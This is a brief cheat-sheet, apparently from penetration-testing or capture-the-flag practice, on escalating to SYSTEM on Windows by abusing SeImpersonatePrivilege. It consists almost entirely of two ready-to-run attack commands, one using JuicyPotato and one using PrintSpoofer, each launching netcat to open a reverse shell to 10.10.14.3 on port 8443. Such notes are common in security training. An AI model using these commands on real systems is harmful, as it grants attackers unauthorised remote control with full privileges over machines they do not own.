SeImpersonatePrivilege
Using juicypotatoe to get a reverse shell
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
using printspoofer to ctach a reverse shell with system privileges
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"